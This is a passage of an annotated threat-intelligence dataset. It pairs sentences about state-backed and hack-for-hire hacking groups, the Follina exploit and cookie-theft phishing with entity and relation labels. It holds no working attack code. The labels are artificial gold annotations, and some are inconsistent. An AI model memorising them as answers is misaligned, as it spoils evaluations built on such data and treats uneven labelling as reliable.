stopwar.pro.","entities":[{"id":50733,"label":"malware","start_offset":39,"end_offset":50},{"id":50732,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":50734,"label":"malware","start_offset":52,"end_offset":68},{"id":50735,"label":"DOMAIN","start_offset":107,"end_offset":118}],"relations":[{"id":999,"from_id":50735,"to_id":50734,"type":"hosts"},{"id":1000,"from_id":50735,"to_id":50733,"type":"hosts"}],"Comments":[]} {"id":4813,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50736,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} {"id":4814,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50737,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} {"id":4815,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50738,"label":"SOFTWARE","start_offset":43,"end_offset":54},{"id":50740,"label":"malware","start_offset":155,"end_offset":177},{"id":50739,"label":"threat-actor","start_offset":130,"end_offset":135}],"relations":[{"id":1001,"from_id":50740,"to_id":50738,"type":"impersonates"},{"id":1003,"from_id":50740,"to_id":50739,"type":"authored-by"}],"Comments":[]} {"id":4816,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50744,"label":"identity","start_offset":188,"end_offset":197},{"id":50745,"label":"TIME","start_offset":80,"end_offset":83},{"id":50743,"label":"TIME","start_offset":159,"end_offset":163},{"id":50742,"label":"vulnerability","start_offset":16,"end_offset":54}],"relations":[],"Comments":[]} {"id":4817,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50748,"label":"SOFTWARE","start_offset":62,"end_offset":110},{"id":50746,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50747,"label":"vulnerability","start_offset":0,"end_offset":7}],"relations":[{"id":1004,"from_id":50746,"to_id":50747,"type":"duplicate-of"},{"id":1005,"from_id":50748,"to_id":50747,"type":"has"}],"Comments":[]} {"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} {"id":4819,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50755,"label":"campaign","start_offset":4,"end_offset":21},{"id":50756,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50757,"label":"location","start_offset":177,"end_offset":184}],"relations":[],"Comments":[]} {"id":4820,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50758,"label":"identity","start_offset":0,"end_offset":3},{"id":50759,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":4821,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50760,"label":"identity","start_offset":44,"end_offset":51},{"id":50761,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50762,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50763,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":1008,"from_id":50761,"to_id":50763,"type":"impersonates"},{"id":1009,"from_id":50761,"to_id":50762,"type":"uses"}],"Comments":[]} {"id":4822,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50765,"label":"malware","start_offset":137,"end_offset":158},{"id":50764,"label":"threat-actor","start_offset":97,"end_offset":102}],"relations":[{"id":1010,"from_id":50764,"to_id":50765,"type":"uses"}],"Comments":[]} {"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} {"id":4824,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50769,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50770,"label":"identity","start_offset":74,"end_offset":77},{"id":50771,"label":"TIME","start_offset":110,"end_offset":115}],"relations":[],"Comments":[]} {"id":4825,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50772,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} {"id":4826,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50774,"label":"location","start_offset":13,"end_offset":20},{"id":50775,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50773,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50776,"label":"attack-pattern","start_offset":93,"end_offset":119}],"relations":[{"id":1013,"from_id":50773,"to_id":50774,"type":"located-at"},{"id":1014,"from_id":50775,"to_id":50773,"type":"duplicate-of"}],"Comments":[]} {"id":4827,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50777,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50779,"label":"SOFTWARE","start_offset":135,"end_offset":154},{"id":50778,"label":"SOFTWARE","start_offset":118,"end_offset":130}],"relations":[],"Comments":[]} {"id":4828,"text":"In at least one case, unrelated to Ukraine, they have leaked information from a compromised account.","entities":[{"id":50780,"label":"location","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":4829,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":50782,"label":"SOFTWARE","start_offset":49,"end_offset":69},{"id":50781,"label":"attack-pattern","start_offset":6,"end_offset":14}],"relations":[],"Comments":[]} {"id":4830,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50783,"label":"identity","start_offset":71,"end_offset":78},{"id":50785,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50786,"label":"tools","start_offset":257,"end_offset":270},{"id":50784,"label":"identity","start_offset":136,"end_offset":175},{"id":14710,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":14713,"label":"threat-actor","start_offset":82,"end_offset":90}],"relations":[{"id":1015,"from_id":14713,"to_id":14710,"type":"duplicate-of"},{"id":1016,"from_id":14710,"to_id":50784,"type":"targets"},{"id":1017,"from_id":14710,"to_id":50785,"type":"uses"},{"id":1018,"from_id":14710,"to_id":50786,"type":"uses"}],"Comments":[]} {"id":4831,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50787,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} {"id":4832,"text":"Email contents vary from COVID-19 vaccine policy to the humanitarian crisis in Ukraine.","entities":[{"id":50788,"label":"location","start_offset":79,"end_offset":86}],"relations":[],"Comments":[]} {"id":4833,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've published analysis on a range of persistent threats including government-backed attackers, commercial surveillance vendors, and serious criminal operators.","entities":[{"id":50790,"label":"identity","start_offset":11,"end_offset":14},{"id":50789,"label":"identity","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} {"id":4834,"text":"Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50791,"label":"attack-pattern","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} {"id":4835,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50792,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4836,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4837,"text":"Both, however, enable attacks by those who would otherwise lack the capabilities to do so.","entities":[],"relations":[],"Comments":[]} {"id":4838,"text":"We have seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.","entities":[{"id":50793,"label":"attack-pattern","start_offset":13,"end_offset":26}],"relations":[],"Comments":[]} {"id":4839,"text":"They also conduct corporate espionage, handily obscuring their clients’ role.","entities":[],"relations":[],"Comments":[]} {"id":4840,"text":"To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.","entities":[{"id":50794,"label":"attack-pattern","start_offset":61,"end_offset":74},{"id":50795,"label":"location","start_offset":90,"end_offset":95},{"id":50797,"label":"location","start_offset":113,"end_offset":133},{"id":50796,"label":"location","start_offset":97,"end_offset":103}],"relations":[],"Comments":[]} {"id":4841,"text":"The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients.","entities":[],"relations":[],"Comments":[]} {"id":4842,"text":"Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.","entities":[{"id":50798,"label":"attack-pattern","start_offset":5,"end_offset":18}],"relations":[],"Comments":[]} {"id":4843,"text":"For example, TAG has observed Indian hack-for-hire firms work with third party private investigative services — intermediaries that reach out for services when a client requires them — and provide data exfiltrated from a successful operation.","entities":[{"id":50800,"label":"location","start_offset":30,"end_offset":36},{"id":50801,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50799,"label":"identity","start_offset":13,"end_offset":16}],"relations":[],"Comments":[]} {"id":4844,"text":"This is detailed in depth in today’s Reuters investigation into the Indian hack-for-hire ecosystem.","entities":[{"id":50803,"label":"location","start_offset":68,"end_offset":74},{"id":50802,"label":"attack-pattern","start_offset":75,"end_offset":88}],"relations":[],"Comments":[]} {"id":4845,"text":"We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.","entities":[{"id":50804,"label":"location","start_offset":22,"end_offset":28},{"id":50805,"label":"identity","start_offset":29,"end_offset":48}],"relations":[{"id":1019,"from_id":50805,"to_id":50804,"type":"located-at"}],"Comments":[]} {"id":4846,"text":"The breadth of targets in hack-for-hire campaigns stands in contrast to many government-backed operations, which often have a clearer delineation of mission and targets.","entities":[{"id":50806,"label":"attack-pattern","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4847,"text":"A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.","entities":[{"id":50812,"label":"location","start_offset":200,"end_offset":206},{"id":50809,"label":"location","start_offset":96,"end_offset":102},{"id":50807,"label":"location","start_offset":26,"end_offset":32},{"id":50808,"label":"identity","start_offset":33,"end_offset":55},{"id":50810,"label":"location","start_offset":132,"end_offset":139},{"id":50811,"label":"location","start_offset":166,"end_offset":173}],"relations":[{"id":1020,"from_id":50808,"to_id":50807,"type":"located-at"},{"id":1021,"from_id":50808,"to_id":50809,"type":"targets"},{"id":1023,"from_id":50808,"to_id":50811,"type":"targets"},{"id":1024,"from_id":50808,"to_id":50812,"type":"targets"},{"id":1022,"from_id":50808,"to_id":50810,"type":"targets"}],"Comments":[]} {"id":4848,"text":"India","entities":[{"id":50813,"label":"location","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":4849,"text":"Since 2012, TAG has been tracking an interwoven set of Indian hack-for-hire actors, with many having previously worked for Indian offensive security providers Appin and Belltrox.","entities":[{"id":50814,"label":"TIME","start_offset":6,"end_offset":10},{"id":50815,"label":"location","start_offset":55,"end_offset":61},{"id":50816,"label":"attack-pattern","start_offset":62,"end_offset":75},{"id":50817,"label":"location","start_offset":123,"end_offset":129},{"id":50818,"label":"identity","start_offset":159,"end_offset":164},{"id":50819,"label":"identity","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} {"id":4850,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":50820,"label":"location","start_offset":95,"end_offset":107},{"id":50821,"label":"location","start_offset":113,"end_offset":133},{"id":50822,"label":"location","start_offset":139,"end_offset":146},{"id":50823,"label":"campaign","start_offset":152,"end_offset":181}],"relations":[{"id":1025,"from_id":50823,"to_id":50822,"type":"targets"},{"id":1026,"from_id":50823,"to_id":50820,"type":"targets"},{"id":1027,"from_id":50823,"to_id":50821,"type":"targets"}],"Comments":[]} {"id":4851,"text":"These credential phishing campaigns have ranged from targeting specific government organizations to AWS accounts to Gmail accounts.","entities":[{"id":50825,"label":"campaign","start_offset":6,"end_offset":35},{"id":50826,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":50827,"label":"SOFTWARE","start_offset":116,"end_offset":121}],"relations":[],"Comments":[]} {"id":4852,"text":"TAG has linked former employees of both Appin and Belltrox to Rebsec, a new firm that openly advertises corporate espionage as an offering on its company website.","entities":[{"id":50828,"label":"identity","start_offset":0,"end_offset":3},{"id":50829,"label":"identity","start_offset":40,"end_offset":45},{"id":50831,"label":"identity","start_offset":62,"end_offset":68},{"id":50830,"label":"identity","start_offset":50,"end_offset":58}],"relations":[],"Comments":[]} {"id":4853,"text":"Russia","entities":[{"id":50832,"label":"location","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4854,"text":"While investigating a 2017 credential phishing campaign that targeted a prominent Russian anti-corruption journalist, we discovered the Russian attacker targeting other journalists, politicians across Europe, and various NGOs and non-profit organizations.","entities":[{"id":50833,"label":"TIME","start_offset":22,"end_offset":26},{"id":50835,"label":"location","start_offset":201,"end_offset":207},{"id":50834,"label":"campaign","start_offset":27,"end_offset":55},{"id":50836,"label":"identity","start_offset":213,"end_offset":254}],"relations":[],"Comments":[]} {"id":4855,"text":"But what stuck out during this investigation was the breadth of targeting, which also included individuals that had no affiliation with the selected organizations, and appeared to be regular, everyday citizens in Russia and surrounding countries.","entities":[{"id":50837,"label":"location","start_offset":213,"end_offset":219}],"relations":[],"Comments":[]} {"id":4856,"text":"This hack-for-hire actor has been publicly referred to as 'Void Balaur'.","entities":[{"id":50838,"label":"attack-pattern","start_offset":5,"end_offset":18},{"id":14831,"label":"threat-actor","start_offset":59,"end_offset":70}],"relations":[],"Comments":[]} {"id":4857,"text":"These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page.","entities":[{"id":50839,"label":"attack-pattern","start_offset":67,"end_offset":86}],"relations":[],"Comments":[]} {"id":4858,"text":"The lures ranged from fake Gmail and other webmail provider notifications to messages spoofing Russian government organizations.","entities":[{"id":50841,"label":"location","start_offset":95,"end_offset":102},{"id":50840,"label":"SOFTWARE","start_offset":27,"end_offset":32}],"relations":[],"Comments":[]} {"id":4859,"text":"After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP.","entities":[{"id":50842,"label":"SOFTWARE","start_offset":154,"end_offset":165}],"relations":[],"Comments":[]} {"id":4860,"text":"Both OAuth tokens and App Passwords are revoked when a user changes their password.","entities":[],"relations":[],"Comments":[]} {"id":4861,"text":"During our early investigation, TAG discovered the attacker’s public website (no longer available) advertising account hacking capabilities for email and social media services.","entities":[{"id":50843,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} {"id":4862,"text":"The site claimed to have received positive reviews on Russian underground forums such as Dublikat and Probiv.cc.","entities":[{"id":50845,"label":"DOMAIN","start_offset":102,"end_offset":111},{"id":50844,"label":"location","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} {"id":4863,"text":"Over the past five years, TAG has observed the group targeting accounts at major webmail providers like Gmail, Hotmail, and Yahoo! and regional webmail providers like abv.bg, mail.ru, inbox.lv, and UKR.net.","entities":[{"id":50846,"label":"identity","start_offset":26,"end_offset":29},{"id":50847,"label":"SOFTWARE","start_offset":104,"end_offset":109},{"id":50849,"label":"SOFTWARE","start_offset":124,"end_offset":130},{"id":50848,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":50850,"label":"SOFTWARE","start_offset":167,"end_offset":173},{"id":50851,"label":"SOFTWARE","start_offset":175,"end_offset":182},{"id":50852,"label":"SOFTWARE","start_offset":184,"end_offset":192},{"id":50853,"label":"SOFTWARE","start_offset":198,"end_offset":205}],"relations":[],"Comments":[]} {"id":4864,"text":"United Arab Emirates TAG is also tracking a hack-for-hire group now based in the United Arab Emirates that is mostly active in the Middle East and North Africa.","entities":[{"id":50856,"label":"location","start_offset":131,"end_offset":142},{"id":50857,"label":"location","start_offset":147,"end_offset":159},{"id":50854,"label":"identity","start_offset":0,"end_offset":24},{"id":50855,"label":"location","start_offset":81,"end_offset":101}],"relations":[],"Comments":[]} {"id":4865,"text":"They have primarily targeted government, education, and political organizations including Middle East focused NGOs in Europe and the Palestinian political party Fatah.","entities":[{"id":50860,"label":"location","start_offset":133,"end_offset":144},{"id":50861,"label":"identity","start_offset":161,"end_offset":166},{"id":50858,"label":"location","start_offset":90,"end_offset":101},{"id":50859,"label":"location","start_offset":118,"end_offset":124},{"id":50862,"label":"identity","start_offset":110,"end_offset":114}],"relations":[],"Comments":[]} {"id":4866,"text":"Amnesty International has also reported on their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4867,"text":"The group commonly uses Google or OWA password reset lures to steal credentials from targets, often using the MailJet or SendGrid API to send phishing emails.","entities":[{"id":50863,"label":"SOFTWARE","start_offset":24,"end_offset":30},{"id":50864,"label":"SOFTWARE","start_offset":34,"end_offset":37},{"id":50865,"label":"attack-pattern","start_offset":38,"end_offset":92},{"id":50866,"label":"SOFTWARE","start_offset":110,"end_offset":117},{"id":50867,"label":"SOFTWARE","start_offset":121,"end_offset":129}],"relations":[],"Comments":[]} {"id":4868,"text":"Unlike many hack-for-hire actors that use open source phishing frameworks like Evilginx or GoPhish, this group uses a custom phishing kit that utilizes Selenium, a self described 'suite of tools for automating web browsers.'","entities":[{"id":50868,"label":"tools","start_offset":79,"end_offset":87},{"id":50869,"label":"tools","start_offset":91,"end_offset":98},{"id":50870,"label":"tools","start_offset":152,"end_offset":160}],"relations":[],"Comments":[]} {"id":4869,"text":"Previously described by Amnesty, this phishing kit has remained under active development over the past five years.","entities":[{"id":50871,"label":"identity","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} {"id":4870,"text":"After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider.","entities":[{"id":50872,"label":"SOFTWARE","start_offset":132,"end_offset":143},{"id":50873,"label":"SOFTWARE","start_offset":170,"end_offset":175}],"relations":[],"Comments":[]} {"id":4871,"text":"The attacker would then use a custom tool to download the mailbox contents via IMAP.","entities":[],"relations":[],"Comments":[]} {"id":4872,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":50874,"label":"malware","start_offset":56,"end_offset":62},{"id":14895,"label":"malware","start_offset":78,"end_offset":83}],"relations":[{"id":1028,"from_id":14895,"to_id":50874,"type":"duplicate-of"}],"Comments":[]} {"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} {"id":4874,"text":"Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.","entities":[{"id":50881,"label":"attack-pattern","start_offset":142,"end_offset":161},{"id":50879,"label":"identity","start_offset":0,"end_offset":11},{"id":50880,"label":"identity","start_offset":42,"end_offset":49}],"relations":[{"id":1030,"from_id":50880,"to_id":50879,"type":"duplicate-of"}],"Comments":[]} {"id":4875,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} {"id":4876,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further harm.","entities":[{"id":50882,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} {"id":4877,"text":"We encourage any high risk user to enable Advanced Protection and Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[{"id":50883,"label":"SOFTWARE","start_offset":66,"end_offset":109},{"id":50884,"label":"SOFTWARE","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} {"id":4878,"text":"Additionally, our CyberCrime Investigation Group is sharing relevant details and indicators with law enforcement.","entities":[{"id":50885,"label":"identity","start_offset":18,"end_offset":48}],"relations":[],"Comments":[]} {"id":4879,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted.","entities":[{"id":50886,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4880,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":4881,"text":" With contributions from Winnona DeSombre UAE hack-for-hire Group Domains: Indian hack-for-hire Group Domains: Russian hack-for-hire Group Domains:","entities":[{"id":50889,"label":"location","start_offset":75,"end_offset":81},{"id":50888,"label":"location","start_offset":42,"end_offset":45},{"id":50890,"label":"location","start_offset":111,"end_offset":118},{"id":50887,"label":"identity","start_offset":25,"end_offset":41}],"relations":[],"Comments":[]} {"id":4882,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50891,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} {"id":4883,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":50892,"label":"TIME","start_offset":11,"end_offset":15},{"id":50893,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":4884,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[],"relations":[],"Comments":[]} {"id":4885,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":50896,"label":"identity","start_offset":38,"end_offset":52},{"id":50897,"label":"identity","start_offset":54,"end_offset":84},{"id":50898,"label":"identity","start_offset":89,"end_offset":108},{"id":50894,"label":"identity","start_offset":22,"end_offset":29},{"id":50899,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":50895,"label":"identity","start_offset":31,"end_offset":36},{"id":50900,"label":"TIME","start_offset":203,"end_offset":211}],"relations":[],"Comments":[]} {"id":4886,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[],"relations":[],"Comments":[]} {"id":4887,"text":"With increased detection efforts, we’ve observed attackers shifting away from Gmail to other email providers (mostly email.cz, seznam.cz, post.cz and aol.com).","entities":[{"id":50905,"label":"identity","start_offset":150,"end_offset":157},{"id":50901,"label":"SOFTWARE","start_offset":78,"end_offset":83},{"id":50903,"label":"identity","start_offset":127,"end_offset":136},{"id":50902,"label":"identity","start_offset":117,"end_offset":125},{"id":50904,"label":"identity","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} {"id":4888,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[{"id":50906,"label":"identity","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} {"id":4889,"text":"In this blog, we share examples of the specific tactics, techniques and procedures (TTPs) used to lure victims, as well as some guidance on how users can further protect themselves.","entities":[],"relations":[],"Comments":[]} {"id":4890,"text":"Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":50907,"label":"attack-pattern","start_offset":0,"end_offset":12},{"id":50908,"label":"attack-pattern","start_offset":29,"end_offset":51},{"id":14981,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} {"id":4891,"text":"While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifting attacker focus to social engineering tactics.","entities":[{"id":50909,"label":"attack-pattern","start_offset":226,"end_offset":244}],"relations":[],"Comments":[]} {"id":4892,"text":" Many YouTube creators provide an email address on their channel for business opportunities.","entities":[],"relations":[],"Comments":[]} {"id":4893,"text":"In this case, the attackers sent forged business emails impersonating an existing company requesting a video advertisement collaboration.","entities":[],"relations":[],"Comments":[]} {"id":4894,"text":"The phishing typically started with a customized email introducing the company and its products.","entities":[{"id":50910,"label":"attack-pattern","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":4895,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":50911,"label":"SOFTWARE","start_offset":127,"end_offset":139}],"relations":[],"Comments":[]} {"id":4896,"text":"Around 15,000 actor accounts were identified, most of which were created for this campaign specifically.","entities":[],"relations":[],"Comments":[]} {"id":4897,"text":" The attackers registered various domains associated with forged companies and built multiple websites for malware delivery.","entities":[],"relations":[],"Comments":[]} {"id":4898,"text":"To date, we’ve identified at least 1,011 domains created solely for this purpose.","entities":[],"relations":[],"Comments":[]} {"id":4899,"text":"Some of the websites impersonated legitimate software sites, such as Luminar, Cisco VPN, games on Steam, and some were generated using online templates.","entities":[{"id":50914,"label":"SOFTWARE","start_offset":78,"end_offset":87},{"id":50915,"label":"SOFTWARE","start_offset":89,"end_offset":103},{"id":50913,"label":"SOFTWARE","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} {"id":4900,"text":"During the pandemic, we also uncovered attackers posing as news providers with a “Covid19 news software.”","entities":[],"relations":[],"Comments":[]} {"id":4901,"text":"In one case, we observed a fake social media page copying content from an existing software company.","entities":[],"relations":[],"Comments":[]} {"id":4902,"text":"The following screenshot is an example of a fake page where the original URL is replaced with one leading to a cookie theft malware download.","entities":[],"relations":[],"Comments":[]} {"id":4903,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":50917,"label":"attack-pattern","start_offset":45,"end_offset":53},{"id":50918,"label":"SOFTWARE","start_offset":69,"end_offset":74},{"id":50919,"label":"SOFTWARE","start_offset":140,"end_offset":148},{"id":50920,"label":"SOFTWARE","start_offset":150,"end_offset":158},{"id":50921,"label":"SOFTWARE","start_offset":162,"end_offset":169},{"id":50916,"label":"identity","start_offset":8,"end_offset":14}],"relations":[],"Comments":[]} {"id":4904,"text":" Once the target runs the fake software, a cookie stealing malware executes, taking browser cookies from the victim’s machine and uploading them to the actor's command & control servers.","entities":[],"relations":[],"Comments":[]} {"id":4905,"text":"Although this type of malware can be configured to be persistent on the victim's machine, these actors are running all malware in non-persistent mode as a smash-and-grab technique.","entities":[],"relations":[],"Comments":[]} {"id":4906,"text":"This is because if the malicious file is not detected when executed, there are less artifacts on an infected host and therefore security products fail to notify the user of a past compromise.","entities":[],"relations":[],"Comments":[]} {"id":4907,"text":"We have observed that actors use various types of malware based on personal preference, most of which are easily available on Github.","entities":[{"id":50922,"label":"SOFTWARE","start_offset":126,"end_offset":132}],"relations":[],"Comments":[]} {"id":4908,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with 